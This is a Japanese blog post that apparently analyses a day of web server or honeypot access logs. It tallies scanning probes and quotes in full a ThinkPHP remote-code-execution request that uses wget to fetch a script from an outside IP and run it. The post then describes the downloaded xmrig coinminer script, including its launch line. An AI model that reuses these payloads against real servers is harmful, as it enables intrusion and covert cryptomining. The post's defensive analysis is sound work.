2019-04-17のアクセス数は442件でした。
■送信元IPアドレスの数は 82件です。
■メソッドの一覧と件数は以下です。
method | 総数 |
GET | 374 |
HEAD | 1 |
POST | 67 |
合計 結果 | 442 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 |
/ | GET | 41 |
/ | HEAD | 1 |
///?author=1 | GET | 1 |
///wp-json/wp/v2/users/ | GET | 1 |
/GponForm/diag_Form?images/ | POST | 1 |
/index.php?s=/index/\think\app/invokefunction&function= call_user_func_array&vars[0]=shell_exec&vars[1][]= wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a | GET | 1 |
/manager/html | GET | 282 |
/phpmy/scripts/setup.php | GET | 2 |
/phpMyAdmin/scripts/setup.php | GET | 5 |
/pma/scripts/setup.php | GET | 2 |
/tmUnblock.cgi | POST | 2 |
/TP/public/index.php | GET | 1 |
/TP/public/index.php?s=index/\think\app/invokefunction& function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | GET | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | GET | 2 |
/wp-login.php | GET | 33 |
/wp-login.php | POST | 32 |
/xmlrpc.php | POST | 32 |
http://112.35.63.31:8088/index.php | GET | 1 |
http://112.35.66.7:8088/index.php | GET | 1 |
気になるlog
-=-=313件目のlog=-=-
[2019-04-17 10:24:59+0900] 123.56.49.19 ほげ:80 "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 False GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Host: ほげ Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive
検体はシェルスクリプト。VTの結果はこちら
このシェルスクリプト、ダウンローダーでxmrig_sというファイル名のマルウェアを落として来るんだけど、自分が感染しているか確認し、感染していたら自身のプロセスを殺して、新たにダウンロードしてくる!
最初に”crontab -r”を実行している。落としてくるマルウェアがcrontabを利用するのだろう。
落としたファイルはELFの64bitでvirustotalはこちら。
コインマイナーである。
そして気づいたのがシェルスクリプトにあった以下の行。
if [ "$(ps -eo comm | grep -c "xmri[g]")" -lt "2" ]; then /tmp/xmrig_s -r 1000 --donate-level 1 -o 119[.]23[.]222[.]239[:]26590 -B -p pass -k --max-cpu-usage=99 ;
“comm”は、コマンド名。grep -c はFILE ごとに一致した行数のみ表示するみたい。
引数の一部に
”-max-cpu-usage=99”
cpuが99%まで使えって事なのか。
IPアドレスはマイニングの送付先と推測できます。(ELF解析しろよって突っ込まないで)
コインマイナーとシェルスクリプトのVirusTotalの検知件数に差が乖離しています。
おそらく攻撃者は本体にハードコートして送り先を埋めるのではなく、
シェルスクリプトをペロペロ変更して、コインマイナーのlifetimeを伸ばす工夫をしているんだろうな。
検体だけ調査しても通信先が解らないって事か。
インシデント対応時は、しっかり証拠保全しましょうって話ですね。